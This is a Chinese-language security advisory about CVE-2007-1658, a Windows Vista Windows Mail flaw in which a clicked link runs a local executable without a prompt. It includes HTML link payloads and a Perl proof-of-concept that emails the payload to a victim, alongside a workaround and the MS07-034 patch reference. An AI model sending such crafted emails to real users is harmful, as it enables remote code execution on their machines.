发布日期：2007-03-23
更新日期：2007-06-12

受影响系统：

Microsoft Windows Vista

描述：

---

BUGTRAQ  ID: 23103
CVE(CAN) ID: CVE-2007-1658

Windows Mail是Windows Vista所捆绑的默认邮件客户端。

Vista Windows Mail在处理邮件中的链接时存在漏洞，远程攻击者可能利用此漏洞在用户机器上执行恶意代码。

如果文件夹中存在相同名称的可执行文件的话，则如果用户点击了邮件中恶意链接的话，Vistas Mail客户端就会执行该可执行文件。假设C:\盘下存在名为blah的文件夹，同时该盘下还存在名为blah.bat的批处理脚本，则如果用户点击了邮件中目标设置为C:\blah的URL的话，就会未经提示执行批处理脚本。

例如，发送包含有以下URL的HTML邮件消息：

<a href="c:/windows/system32/winrm?">Click here!</a>
或
<a href="c:/windows/system32/migwiz?">Click here!</a>

就会未经提示执行winrm.cmd/migwiz.exe。

<*来源：Kingcope （kingcope@gmx.net）
  
  链接：http://marc.info/?l=full-disclosure&m=117463624025988&w=2
        http://secunia.com/advisories/25639/
        http://www.microsoft.com/technet/security/Bulletin/ms07-034.mspx?pf=true
        http://www.us-cert.gov/cas/techalerts/TA07-163A.html
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

---snip---
use Net::SMTP_auth;
$smtp = Net::SMTP_auth->new('smtp.1und1.de', Debug => 1);

$smtp->auth('PLAIN', 'username', 'password');
$smtp->mail("attacker\@attacker.com");
$smtp->to("victim\@victim.com");

$msg = "Subject: Vista Remote Code Exec\r\n"
."From: attacker\@attacker.com\r\n"
."To: victim\@victim.com\r\n"
."MIME-Version: 1.0\r\n"
."Content-Type: text/html\r\n\r\n<a href=\"c:/windows/system32/winrm?\">Click here!</a>";
$smtp->data();
$smtp->datasend("$msg\n");
$smtp->dataend();
$smtp->quit;
---snip---

建议：

---

临时解决方法：

如果您不能立刻安装补丁或者升级，NSFOCUS建议您采取以下措施以降低威胁：

* 以纯文本格式阅读邮件消息以防范HTML邮件攻击。

厂商补丁：

Microsoft
---------
Microsoft已经为此发布了一个安全公告（MS07-034）以及相应补丁:
MS07-034：Cumulative Security Update for Outlook Express and Windows Mail (929123)
链接：http://www.microsoft.com/technet/security/Bulletin/ms07-034.mspx?pf=true

浏览次数：3548
严重程度：0（网友投票）